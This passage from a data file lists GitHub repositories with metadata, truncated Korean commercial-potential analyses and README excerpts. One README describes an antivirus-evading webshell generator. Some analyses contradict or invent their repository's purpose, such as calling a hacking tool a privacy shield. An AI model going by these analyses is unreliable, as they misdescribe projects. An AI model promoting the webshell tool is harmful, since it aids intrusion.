Server\n\nPartly implemented RFC 1928 (https://tools.ietf.org/html/rfc1928) / SOCKS Protocol Version 5 under C/C++ on Windows. This might be useful for other projects in the future.\n\nBIND/UDP mode or Socks4 is not supported at the moment. Should be fairly easy to add the changes.\n","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"Rodrigo-Souza-DEV/Card-Yugioh-3D","github_url":"https://github.com/Rodrigo-Souza-DEV/Card-Yugioh-3D","stars":14,"language":"CSS","license":"unknown","abandonment_months":58,"description":"# Card-Yugioh-3D 프로젝트 분석\n\n## 왜 보물인가\n유명한 카드 게임을 3D 입체 효과로 시뮬레이션할 수 있는 기술로, 게임 회사나 수집품 판매 플랫폼이 매력적인 사용자 경험을 제공하는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 카드 게임 플랫폼**: 실제 카드처럼 입체감 있게 보이는 게임 환경을 만들어 사용자 만","readme_excerpt":"# Card-Yugioh-3D\n\n<hr>\n<h2>📋 Sobre o projeto</h2>\n<p>Animação 3D criada com CSS Puro.</p>\n <h2 id=\"techs\"> 💻 Tecnologias</h2>\n \n- [HTML]()\n- [CSS]()\n\n<h2>🎨 Layouts</h2>\n<img src=\"img/yugioh.gif\">\n\n <h2 id=\"autor\"> 🦸 Autor</h2>\n\n[Rodrigo-Souza-Dev](https://github.com/Rodrigo-Souza-DEV)\n\n<p>Feito por Rodrigo Souza.</p>\n<hr>\n\n","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"mikescamell/Loco-MotionLayout","github_url":"https://github.com/mikescamell/Loco-MotionLayout","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":76,"description":"# Loco-MotionLayout 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면이 매끄럽게 움직이고 변형되는 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발사들을 위한 애니메이션 효과 제작 플랫폼으로 운영\n2. **내부 업무 도구**: 스타트업 앱 개발팀의 UI 효과 라이브러리로 활용하여 개발 속도","readme_excerpt":"# Loco-MotionLayout\nDemo app for the talk \"Do the Loco-MotionLayout\" presented at droidcon Italy, droidcon Boston, 360AnDev &amp; droidcon London 2019 along with examples using MotionLayout\n\n## Video\n\n[![Watch here](https://img.youtube.com/vi/TcKGOxsrxCM/0.jpg)](https://www.youtube.com/watch?v=TcKGOxsrxCM)\n\n## Abstract\n\nYou’ve heard, seen or witnessed the buzz around MotionLayout. But what does it look like in real life? What are some of its current limitations? How easy is it to use? Are the demos that you’ve seen actually possible? Or is it all a ruse? \n\nIn this session, you’ll use MotionLayout to develop an animation taken straight from a crazy designer’s mock-up. A mock-up that you see and crumble at just how long it would typically take you to build it on Android. Throughout this talk, you’ll see some animated goodness and you’ll learn some of the fundamentals of how MotionLayout works. You’ll find out what a MotionScene is and how you can use it to separate your states and transi","composite_score":0.501,"license_safety_tag":"safe"},{"name":"easychen/windrecorder","github_url":"https://github.com/easychen/windrecorder","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":59,"description":"# windrecorder 저장소 분석\n\n## 왜 보물인가\n컴퓨터 화면에서 벌어지는 모든 일을 자동으로 기록하는 도구로, 업무 중 놓친 내용을 나중에 찾아볼 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 직원들이 구독하는 업무 기록 도구로 제공 (PC 활동 자동 저장 및 검색 기능)\n2. **내부 업무 도구**: 대형 기","readme_excerpt":"# WindRecorder\n\n[中文说明](README.cn.md)\n\n## TLDR\n\nWind Recorder is a docker image for recording \"self-playing web pages\". You can try it out with a quick test.\n\nFirst build a \"self-playing web page\": \n\n1. cd demo && yarn install && yarn start\n\nRun the docker command: \n\n1. open demo.sh \n2. change `dd.ftqq.com` to be the LAN IP \n3. Run the command bash demo.sh\n\nAfter running, you can view the recorded video in the root directory.Click here to view [recorded video](demo.mp4) directly.\n\n## What is Wind Recorder\n\n![](logo.svg) \n\n\n[WindMark.pro] is a free online tool for video production using the [Tailwind CSS](https://tailwindcss.com/) framework and [Markdown](https://en.wikipedia.org/wiki/Markdown).\n\nThe principle is to create autoplay web pages using web technology and record them as videos when accessed through a browser.\n\nWind Recorder] is the open source project used by [WindMark.pro] to record not only the web pages generated by [WindMark.pro], but also any web pages that can be rendere","composite_score":0.501,"license_safety_tag":"safe"},{"name":"TeXmeijin/anyway-merge-app","github_url":"https://github.com/TeXmeijin/anyway-merge-app","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":51,"description":"# TeXmeijin/anyway-merge-app 분석\n\n## 왜 보물인가\n여러 개의 파일이나 데이터를 자동으로 합쳐주는 도구로, 반복적인 수작업을 줄여 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 문서 작성 플랫폼에서 사용자들의 여러 문서를 한 번에 정리해주는 기능\n2. **내부 업무 도구**: ","readme_excerpt":"# Anyway Merge App\n<p align=\"center\">\n  <img src=\"public/images/logo-readme.svg\" />\n</p>\n\n# 🎄 参加方法(重要)\n\n- ブランチを適当に切って作業し、Pull Request を出してください\n  - Fork したリポジトリからの Pull Request で OK です\n- 私は Draft ではない Pull Request を見たら脳死でマージしてしまうので、作成途中で Pull Request を作る方は Draft にしてください\n  - もしリポジトリに 2 日以上音沙汰なければ https://twitter.com/Meijin_garden までご連絡ください\n\n## セットアップ手順\n\n### NextAuth (ユーザー認証用)\n\nルートに `.env.local` ファイルを作成し、下記内容を記載すると、ユーザー名「noushi」 / パスワード「noushi」でログインできるようになります。\n\n```\nSECRET=randomstring\nSIGNIN_USERNAME=noushi\nSIGNIN_PASSWORD=noushi\n```\n\n# 毎日誰かのプルリクを脳死でマージするアドベントカレンダー\n\n## 概要\n\n### アドベントカレンダー URL\n\nhttps://qiita.com/advent-calendar/2021/full-scratch-awesome-app-nextjs\n\n### 企画概要\n\n初日に私が空っぽの Next.js プロジェクトを作って公開しておくので、25 日間毎日誰かが Pull Request 出して脳死でマージしていき、12 月 25 日に何ができているでしょう？アドベントカレンダーです。\nノリで作ったアドベントカレンダーなので気軽に参加してください！いったい最後はどんなアプリケーションになってることやら・・・\n\nなんの役にも立たないコンポーネント作って設置するもよし、\n自分の思う最強の ESLint ルールを書き込むもよし、\nFirebase 等の PaaS を接続する実装をしてセットアップ手順を README に残しておくもよしです。\n考えた当初は、みんなの Next.js の知見が集まるといいなと","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"Liqunkit/LiqunShield","github_url":"https://github.com/Liqunkit/LiqunShield","stars":9,"language":"","license":"unknown","abandonment_months":53,"description":"# LiqunShield 상용화 분석\n\n## 왜 보물인가\n개인 정보와 데이터를 보호하는 보안 기술로, 해킹이나 정보 유출로부터 사용자를 지키려는 모든 서비스에 필수적인 요소입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 보안 강화**: 회원 정보를 다루는 웹 서비스(은행, 쇼핑몰, SNS)에 기본 보안 계층으로 추가\n2. **내부 업무 도구**: 기업","readme_excerpt":"\n# 遵守规章制度关闭项目\n\n仅限于内部测试使用，请勿用于未授权的攻击！！ \n\n该程序及用于安全人员本地测试使用！！\n\n用户滥用造成的一切后果与作者无关！！\n\n使用者请务必遵守当地法律！！ \n\n本程序不得用于商业用途，仅限学习交流！！\n","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"tannuchoudhary/GraphSeries","github_url":"https://github.com/tannuchoudhary/GraphSeries","stars":5,"language":"","license":"unknown","abandonment_months":29,"description":"# GraphSeries 저장소 분석\n\n## 왜 보물인가\n그래프(네트워크 연결 구조)를 다루는 데이터를 체계적으로 처리하고 시각화할 수 있는 도구로, 복잡한 관계도를 쉽게 분석할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 네트워크 분석 SaaS**: 인플루언서 간 관계도, 팔로워 네트워크를 자동으로 그려주는 웹 서비스\n2. **기업 조직도 생성","readme_excerpt":"# GraphSeries","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"oslabs-beta/Kafkasocks","github_url":"https://github.com/oslabs-beta/Kafkasocks","stars":22,"language":"JavaScript","license":"MIT","abandonment_months":53,"description":"# Kafkasocks 분석 보고서\n\n## 왜 보물인가\n대용량 실시간 데이터를 안정적으로 처리하는 기업들이 필요로 하는 핵심 기술을 오픈소스로 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 실시간 데이터 분석 대시보드 제공 서비스 (주식, 센서 모니터링)\n2. **내부 업무 도구**: 대규모 로그 수집 및 분석 시스템 (금융사, 전자","readme_excerpt":"<p align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/76595505/120492529-2645a880-c388-11eb-8533-779b6770b243.png\" width=\"250\" />\n</p>\n<h1 align =\"center\">Kafka Socks</h1>\n<p align=\"center\">An easy-to-use, lightweight KafkaJS-to-Socket.io library for connecting and visualizing data in realtime.</p>\n<p align=\"center\">\n<a href=\"https://github.com/oslabs-beta/Kafkasocks/blob/main/LICENSE\"><img alt=\"GitHub license\" src=\"https://img.shields.io/github/license/oslabs-beta/Kafkasocks\"></a>\n<img alt=\"npm\" src=\"https://img.shields.io/npm/v/kafka-socks\">\n<a href=\"https://github.com/oslabs-beta/Kafkasocks/stargazers\"><img alt=\"GitHub stars\" src=\"https://img.shields.io/github/stars/oslabs-beta/Kafkasocks\"></a>\n<a href=\"https://github.com/oslabs-beta/Kafkasocks/issues\"><img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/oslabs-beta/Kafkasocks\"></a>\n<img alt=\"GitHub last commit\" src=\"https://img.shields.io/github/last-commit/oslabs-beta/Kafkasocks\">\n <a href=\"https://w","composite_score":0.501,"license_safety_tag":"safe"},{"name":"Christian-lyc/NAM","github_url":"https://github.com/Christian-lyc/NAM","stars":10,"language":"Python","license":"unknown","abandonment_months":57,"description":"# Christian-lyc/NAM 저장소 분석\n\n## 왜 보물인가\n구체적인 설명이 없어 정확한 가치 판단이 어렵지만, 10개의 관심(Star)을 받은 것으로 보아 특정 분야 전문가들 사이에서 유용성을 인정받고 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **음성/음향 분석 서비스**: 음악 제작자나 팟캐스트 제작사를 위한 오디오 품질 자동 검사 웹 ","readme_excerpt":"# NAM","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"endink/Thrifty","github_url":"https://github.com/endink/Thrifty","stars":10,"language":"C#","license":"Apache-2.0","abandonment_months":40,"description":"# Thrifty 저장소 분석\n\n## 왜 보물인가\n작은 파일 크기로 빠르게 동작하는 가벼운 소프트웨어 개발 도구로, 개발자들이 무거운 기존 도구의 대안으로 찾고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 대상 웹 기반 코드 분석·최적화 플랫폼\n2. **내부 업무 도구**: 대기업 개발팀의 소프트웨어 성능 검사 자동화 시스템\n","readme_excerpt":"# Thrifty Project\n\n   \n   \nThrifty.Net is a port of [Swift（from facebook）](https://github.com/facebook/swift) for .Net , an attribute-based library for creating Thrift serializable types and services.\n\nyou can write C# attributed object instead of IDL file and IDL generation cli.\n\n### Thrifty = Thrift + Netty\n\n[![Hex.pm](https://img.shields.io/hexpm/l/plug.svg)]()\n[![Github All Releases](https://img.shields.io/github/downloads/endink/Thrifty/total.svg?style=flat-square)](https://github.com/endink/Thrifty/archive/master.zip)\n[![NuGet](https://img.shields.io/nuget/v/Thrifty.MicroServices.svg)](https://www.nuget.org/packages/Thrifty.MicroServices/)\n[![coverage](https://img.shields.io/badge/coverage-92%25-red.svg)]()\n\n|       OS      | Testing |\n|-------------|:----------:|\n|**Linux**|[![test ok](https://img.shields.io/badge/eureka-testing%20pass-green.svg)]() [![test ok](https://img.shields.io/badge/end2end-testing%20pass-green.svg)]()|\n|**Windows**  |[![test ok](https://img.shields.io/ba","composite_score":0.501,"license_safety_tag":"safe"},{"name":"shahriar-shojib/bkash-payment-gateway","github_url":"https://github.com/shahriar-shojib/bkash-payment-gateway","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":34,"description":"# bkash-payment-gateway 분석\n\n## 왜 보물인가\n방글라데시에서 가장 많이 쓰는 모바일 송금 서비스인 bKash를 온라인 가게에 쉽게 연결해주는 도구로, 동남아시아 전자상거래 시장에서 필수적인 결제 수단입니다.\n\n## 어디에 쓸 수 있나\n- **방글라데시 쇼핑몰 SaaS**: 소규모 온라인 판매자들을 위한 결제 기능이 탑재된 웹사이트 제작","readme_excerpt":"# bkash-payment-gateway\r\n\r\nNodejs library to accept bkash payments on your backend application\r\n\r\n![CodeQL](https://github.com/shahriar-shojib/bkash-payment-gateway/workflows/CodeQL/badge.svg)\r\n![Test for linting and formatting](https://github.com/shahriar-shojib/bkash-payment-gateway/workflows/Test%20for%20linting%20and%20formatting/badge.svg)\r\n![Publish to NPM and Github Packages](https://github.com/shahriar-shojib/bkash-payment-gateway/workflows/Publish%20to%20NPM%20and%20Github%20Packages/badge.svg)\r\n\r\n## Examples\r\n\r\n- [Express](https://github.com/shahriar-shojib/bkash-payment-gateway/tree/main/examples)\r\n\r\n## Features\r\n\r\n- Implements all the methods required to get accepted as a merchant on bKash\r\n- Written in typescript\r\n- Get intellisense in when interacting with the library `vscode`\r\n- Get Documentation and examples right inside your code editor `vscode`\r\n- Get Bkash Response Intellisense\r\n- Abort Request when an executePayment request exceeds `30 seconds` and get an error so t","composite_score":0.501,"license_safety_tag":"safe"},{"name":"jiangzhengnan/Xerath","github_url":"https://github.com/jiangzhengnan/Xerath","stars":6,"language":"Java","license":"unknown","abandonment_months":48,"description":"# Xerath 저장소 분석\n\n## 왜 보물인가\n프로젝트 정보가 매우 제한적(설명 없음, 별 6개, 2022년 이후 미업데이트)이어서 현재 상태로는 시장성을 판단하기 어렵습니다.\n더 자세한 기술 검토가 선행되어야 합니다.\n\n## 어디에 쓸 수 있나\n**1. 데이터 분석 플랫폼 SaaS**: 기업들이 월 구독으로 데이터를 자동 분석하고 리포트 받는 서비스\n*","readme_excerpt":"简体中文 | [English](./README.en.md) |<br />\n### Xerath\n![Groovy](https://img.shields.io/badge/language-Groovy-green.svg)\n![Java](https://img.shields.io/badge/language-Java-red.svg)\n![visitors](https://visitor-badge.laobi.icu/badge?page_id=jiangzhengnan.xerath.read.me)\n</br>\nXerath 是一个通过 [自定义注解]+[ASM](https://asm.ow2.io/) + [Gradle Transform API](http://tools.android.com/tech-docs/new-build-system/transform-api)\n实现的一套功能强大，方便开发，并且能够有效减少重复代码的Android Aop 整合开发方案。<br/>\n旨在编译器进行全局性的修改，来完成一些诸如方法耗时统计，异常收集，拦截，动态代理等特殊需求,以及降低包Size等优化需求<br/>\n核心思想基于AOP编程，AOP为Aspect Oriented Programming的缩写，意为：面向切面编程<br/>\n🔧持续开发中，欢迎共建!<br />\n<br />\n<img src=\"https://github.com/jiangzhengnan/Xerath/blob/master/app/src/main/res/raw/ic_bg.png\" width=\"50%\"/><br />\n\n### 快速上手\nclone 本工程到本地以后，在根目录打开终端执行以下指令，就可以成功跑起来!<br />\n```\nsh upload.sh \n```\n<br />\n### 引入方式\n待上传到Maven,目前可以主动依赖 XerathLib 到你自己的工程中。<br />\n\n### 功能列表(补充中)\n<img src=\"https://github.com/jiangzhengnan/Xerath/blob/master/app/src/main/res/raw/ic_func.jpg\" width=\"30%\" /><br","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"karasjs/karas","github_url":"https://github.com/karasjs/karas","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":26,"description":"# Karas 저장소 분석\n\n## 왜 보물인가\n웹 디자인 작업을 자동화하고 빠르게 처리할 수 있는 도구로, 디자이너와 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 자동 생성 플랫폼으로, 사용자가 클릭만으로 전문적인 디자인의 웹페이지를 만들 수 있게 제공\n2. **내부 업무 도구**: 대규모 마","readme_excerpt":"# karas(鸦)\nA declarative JavaScript framework for RIA on Canvas/Svg/Webgl.\n\n---\nkaras实现了一个微型浏览器引擎，同时扩充CSS/WAA在样式/动画上的标准，增强类似SVG的矢量标签描述语法，结合JSX/React的开发方式，形成一个对前端友好的RIA框架。\n\n[![NPM version](https://img.shields.io/npm/v/karas.svg)](https://npmjs.org/package/karas)\n![CI](https://github.com/karasjs/karas/workflows/CI/badge.svg)\n\n[![logo](https://raw.githubusercontent.com/karasjs/karas/master/logo.png)](https://raw.githubusercontent.com/karasjs/karas/master/logo.png)\n\n## Install\n```\nnpm install karas\n```\n\n## Framework\n[![framework](https://raw.githubusercontent.com/karasjs/karas/master/framework.png)](https://raw.githubusercontent.com/karasjs/karas/master/framework.png)\n\n## API\n* https://github.com/karasjs/karas/blob/master/api.md\n* https://github.com/karasjs/karas/blob/master/csx.md\n\n## Demo\n* demo目录下是一个web端的演示教程示例，可直接本地预览\n* `CSX`（扩展$矢量标签的JSX）预编译工具建议使用`babel-preset-karas`：https://github.com/karasjs/babel-preset-karas [![NPM version](https://img.shields.io/npm/v/babel-preset-karas.svg)](http","composite_score":0.501,"license_safety_tag":"safe"},{"name":"pureqh/Troy","github_url":"https://github.com/pureqh/Troy","stars":6,"language":"Python","license":"unknown","abandonment_months":46,"description":"# Troy 저장소 분석\n\n## 왜 보물인가\n프로젝트명이 \"Troy\"이고 별이 6개인 초기 단계 프로젝트로, **정확한 목적과 기능이 공개 정보에 없어 평가하기 어렵습니다.** 저장소 설명이 없어 실제 가치를 판단할 수 없습니다.\n\n## 어디에 쓸 수 있나\n프로젝트 목적이 불명확하여 구체적인 활용 시나리오를 제안하기 어렵습니다. 코드를 직접 확인한 후 다음","readme_excerpt":"# Troy\n仅供学习 请勿用作非法用途<br>\n\n\n特洛伊<br>\n更高级的免杀webshell生成工具 <br>\n适配冰蝎及蚁剑 <br>\n\n\n","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"fossasia/sciencehack.in","github_url":"https://github.com/fossasia/sciencehack.in","stars":12,"language":"HTML","license":"MIT","abandonment_months":93,"description":"# sciencehack.in 보물 분석\n\n## 왜 보물인가\n과학 교육과 해킹(프로그래밍) 문화를 결합하여 어린 학생들이 실습하며 배울 수 있는 플랫폼으로, 아시아 지역의 과학 교육 수요가 높은 시장에서 차별성 있는 콘텐츠를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 학교/교육센터 대상 과학 실험 온라인 수업 플랫폼으로 월 구독","readme_excerpt":"# Website powering Science Hack Day India 2013-2016\n\n## Credits\nBased on the [Clean Blog](http://startbootstrap.com/template-overviews/clean-blog/) theme using Bootstrap\n\n## Copyright and License\n\nCopyright(c) Science Hack Day India. Code released under the [MIT](https://github.com/BlackrockDigital/startbootstrap-clean-blog/blob/gh-pages/LICENSE) license.\n","composite_score":0.501,"license_safety_tag":"safe"},{"name":"NikhilAsogekar3/Character-control-using-body-posture","github_url":"https://github.com/NikhilAsogekar3/Character-control-using-body-posture","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":61,"description":"# Character Control Using Body Posture 분석\n\n## 왜 보물인가\n카메라만으로 당신의 몸 움직임을 인식해서 게임 캐릭터를 조종할 수 있는 기술로, 조이스틱 없이도 게임을 즐길 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **피트니스 게임 SaaS**: 운동하면서 게임을 즐기는 구독형 서비스 (월 월드컵, 피트니스 앱처럼)\n2","readme_excerpt":"# Character-control-using-body-posture\n\nThis is a small project using python OpenCV, mediapipe, and Tkinter. Here we can control the character's movement using our body posture.\nThis can be improved further and lot of amazing things we can do with it.\nUpdation of the code is highly appreciated.\n\nThank you.\n\n## Getting Started\n\nTo get started you need to:\n\n1. Clone the repository.\n2. Install dependencies and Prerequisites\n3. Run Python Script\n\n### Prerequisites\n\n1. Windows or Ubuntu 18.04 bionic\n2. Python Dependencies\n3. Conda Environment (Follow only if normal python Env. not working)\n\n### Installing\n\n**Python Dependencies**\n```\nsudo apt install python3-dev python3-pip\npip install --upgrade pip\n\n```\n\n### Conda Steps to follow\n\n**Installation**\n\n1. https://docs.anaconda.com/anaconda/install/linux/#installing-on-linux\n2. https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf\n\n**Conda Dependencies**\n```\nconda activate env_name\nconda ","composite_score":0.501,"license_safety_tag":"safe"},{"name":"chengquan223/map-canvas","github_url":"https://github.com/chengquan223/map-canvas","stars":21,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# map-canvas 상용화 분석\n\n## 왜 보물인가\n웹사이트에 지도를 예쁘게 표시하고 상호작용하게 만드는 기술로, 부동산·배달·여행 서비스 등 지도가 필요한 모든 비즈니스에서 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 지도 기반 배달앱 플랫폼**\n- 소상공인이 배달 서비스를 쉽게 시작할 수 있도록 지도 기능을 제공하는 월구독","readme_excerpt":"<!--\n * @Author: your name\n * @Date: 2017-03-15 21:36:45\n * @LastEditTime: 2021-04-13 18:48:12\n * @LastEditors: Please set LastEditors\n * @Description: In User Settings Edit\n * @FilePath: \\map-canvas\\README.md\n-->\n# map-canvas\n基于baidu、google、openlayers、arcgis、高德地图扩展canvas图层，进行数据可视化。\n\n## demos\n|   [百度地图-闪烁](https://kobef08.github.io/map-canvas/examples/baidu-map-flashmarker.html)  |  [百度地图-迁徙](https://kobef08.github.io/map-canvas/examples/baidu-map-move.html) |\n|  ----   | ----  |\n| <a href=\"https://kobef08.github.io/map-canvas/examples/baidu-map-flashmarker.html\" target=\"_blank\"><img src=\"./asset/001.gif\" width = \"300\" height = \"200\" alt=\"百度地图-闪烁\" align=center /></a>  | <a href=\"https://kobef08.github.io/map-canvas/examples/baidu-map-move.html\" target=\"_blank\"><img src=\"./asset/002.gif\" width = \"300\" height = \"200\" alt=\"百度地图-迁徙\" align=center /></a>  | \n| [百度地图-台风](https://kobef08.github.io/map-canvas/examples/baidu-map-typhoon-old.html)  | [百度地图-风](https://kobef08.github.io/map-canvas/","composite_score":0.501,"license_safety_tag":"safe"},{"name":"HXSecurity/DongTai-engine","github_url":"https://github.com/HXSecurity/DongTai-engine","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":50,"description":"# DongTai-engine 상품화 분석\n\n## 왜 보물인가\n웹사이트와 앱의 보안 취약점을 자동으로 찾아내는 도구로, 기업들이 해킹 피해를 사전에 막을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업들이 구독해서 자사 앱의 보안을 주기적으로 검사하는 온라인 서비스\n2. **내부 업무 도구**: 대기업의 개발팀이 ","readme_excerpt":"# DongTai-engine\n[![license Apache-2.0](https://img.shields.io/github/license/HXSecurity/DongTai-engine)](https://github.com/HXSecurity/DongTai-engine/blob/main/LICENSE)\n[![GitHub stars](https://img.shields.io/github/stars/HXSecurity/DongTai-engine.svg?label=Stars&logo=github)](https://github.com/HXSecurity/DongTai-engine)\n[![GitHub forks](https://img.shields.io/github/forks/HXSecurity/DongTai-engine?label=Forks&logo=github)](https://github.com/HXSecurity/DongTai-engine)\n[![GitHub Contributors](https://img.shields.io/github/contributors-anon/HXSecurity/DongTai-engine?label=Contributors&logo=github)](https://github.com/HXSecurity/DongTai-engine)\n\n[![django-project](https://img.shields.io/badge/django%20versions-3.0.3-blue)](https://www.djangoproject.com/)\n[![Release DongTai Engine](https://github.com/HXSecurity/DongTai-engine/actions/workflows/release_engine.yml/badge.svg)](https://github.com/HXSecurity/DongTai-engine/actions/workflows/release_engine.yml)\n[![Github Version](https://img.","composite_score":0.501,"license_safety_tag":"safe"},{"name":"AndreasMadsen/python-lrcurve","github_url":"https://github.com/AndreasMadsen/python-lrcurve","stars":16,"language":"Jupyter Notebook","license":"MIT","abandonment_months":52,"description":"","readme_excerpt":"# lrcurve\n\n**Creates a learning-curve plot for Jupyter/Colab notebooks that is\nupdated in real-time.**\n\nThere is a framework agnostic interface `lrcurve.PlotLearningCurve`\nthat works well with PyTorch and Tensorflow and a keras wrapper\n`lrcurve.KerasLearningCurve` that uses the keras callback interface.\n\n`lrcurve` works with python 3.6 or newer and is distributed under the\nMIT license.\n\n![Gif of learning-curve](gifs/readme_header.gif)\n\n## Install\n\n```bash\npip install -U lrcurve\n```\n\n## API\n\n* [`lrcurve.PlotLearningCurve`](lrcurve/plot_learning_curve.py)\n* [`lrcurve.KerasLearningCurve`](lrcurve/keras_learning_curve.py)\n\n## Examples\n\n* [Keras example](#keras-example)\n* [Framework agnostic example](#framework-agnostic-example)\n* [PyTorch example](#pytorch-example)\n\n### Keras example\n[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/AndreasMadsen/python-lrcurve/blob/master/notebooks/keras_example.ipynb)\n\n```python\nfrom lrc","composite_score":0.501,"license_safety_tag":"safe"},{"name":"nobadbad/basic-component","github_url":"https://github.com/nobadbad/basic-component","stars":40,"language":"TypeScript","license":"unknown","abandonment_months":43,"description":"# nobadbad/basic-component 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 반복적으로 사용하는 기본 부품들을 미리 만들어둔 도구모음이라, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 빠르게 프로토타입을 만들어야 하는 스타트업이 이 도구를 사용해 초기 상품 출시 기간을 3-6개월 단축","readme_excerpt":"# About\nuse storybook which is an open source tool for building UI components and pages in isolation.you can see some examples from it\n\nLive demo: https://storybook.xuance.top\n\n\n\n\n## Available Scripts\n\nIn the project directory, you can run:\n\n### `npm start`\n\nRuns the app in the development mode.\\\nOpen [http://localhost:3000](http://localhost:3000) to view it in the browser.\n\nThe page will reload if you make edits.\\\nYou will also see any lint errors in the console.\n\n### `npm test`\n\nLaunches the test runner in the interactive watch mode.\\\nSee the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information.\n\n### `npm run build`\n\nBuilds the app for production to the `build` folder.\\\nIt correctly bundles React in production mode and optimizes the build for the best performance.\n\nThe build is minified and the filenames include the hashes.\\\nYour app is ready to be deployed!\n\nSee the section about [deployment](https://facebook.github.io/cr","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"IanMitchell/hackweek-discord-api-docs","github_url":"https://github.com/IanMitchell/hackweek-discord-api-docs","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":25,"description":"# IanMitchell/hackweek-discord-api-docs 분석\n\n## 왜 보물인가\nDiscord(유명한 메신저 앱)의 기술 문서를 정리한 자료로, 이를 바탕으로 Discord와 연동하는 새로운 서비스나 도구를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **Discord 봇 제작 회사**: 기업이나 게임단이 Discord에서 자동화된 ","readme_excerpt":"# discord.dev\n\nThis is a Discord hackweek project. This codebase is owned by Discord, despite being under a personal account. As is the nature of hackweek, not all projects ship - this website is an idea/suggestion, not a planned thing.\n\nIf you're interested in seeing more (we're streaming through hackweek!), join us [on Discord](https://discord.gg/ian)\n","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"Teamwork/reload","github_url":"https://github.com/Teamwork/reload","stars":26,"language":"Go","license":"MIT","abandonment_months":33,"description":"# Teamwork/reload 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 다시 로드하는 기술로, 개발자들이 코드를 수정할 때마다 매번 처음부터 시작할 필요 없이 변경사항만 즉시 반영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 도구 SaaS**: 클라우드 기반 코딩 환경에서 실시간 코드 변경 반영 기능 제공\n2. **기","readme_excerpt":"[![GoDoc](https://godoc.org/github.com/teamwork/reload?status.svg)](https://godoc.org/github.com/teamwork/reload)\n[![Build Status](https://travis-ci.com/Teamwork/reload.svg?branch=master)](https://travis-ci.com/Teamwork/reload)\n[![codecov](https://codecov.io/gh/Teamwork/reload/branch/master/graph/badge.svg?token=n0k8YjbQOL)](https://codecov.io/gh/Teamwork/reload)\n\nLightweight automatic reloading of Go processes.\n\nAfter initialisation with `reload.Do()` any changes to the binary (and *only*\nthe binary) will restart the process. For example:\n\n```go\nfunc main() {\n    go func() {\n        err := reload.Do(log.Printf)\n        if err != nil {\n            panic(err) // Only returns initialisation errors.\n        }\n    }()\n\n    fmt.Println(os.Args)\n    fmt.Println(os.Environ())\n    ch := make(chan bool)\n    <-ch\n}\n```\n\nNow use `go install` or `go build` to restart the process.\n\nAdditional directories can be watched using `reload.Dir()`; this is useful for\nreloading templates:\n\n```go\nfunc main()","composite_score":0.501,"license_safety_tag":"safe"},{"name":"roberto-butti/50-drops-of-php","github_url":"https://github.com/roberto-butti/50-drops-of-php","stars":12,"language":"HTML","license":"NOASSERTION","abandonment_months":31,"description":"# roberto-butti/50-drops-of-php 분석\n\n## 왜 보물인가\nPHP라는 웹개발 언어의 핵심 개념을 50가지 작은 예제로 정리한 학습 자료로, 초보자도 단계적으로 배울 수 있는 구조입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 프로그래밍 강좌 서비스**: 이 50가지 예제를 영상 강의와 함께 구독형으로 판매하는 교육 플랫폼\n2. *","readme_excerpt":"> **Update!!!** The book \"50 drops of PHP\" is now considered obsolete. A more recent and comprehensive version is available for readers. You can access it here: [Some Drops of PHP](https://drops-of-php.hi-folks.dev/). Unlike the previous PDF version, this updated edition is conveniently accessible through your browser, providing a seamless reading experience. Additionally, it has been thoroughly reviewed and enriched with detailed explanations for a broader array of PHP functions, ensuring you have the most up-to-date and insightful resource at your fingertips. \"Some Drops of PHP\" is still open source and available for everyone in this repository: https://github.com/roberto-butti/some-drops-of-php \n\n# The Book: 50 drops of PHP\n\n\nThis book collects 50 useful, 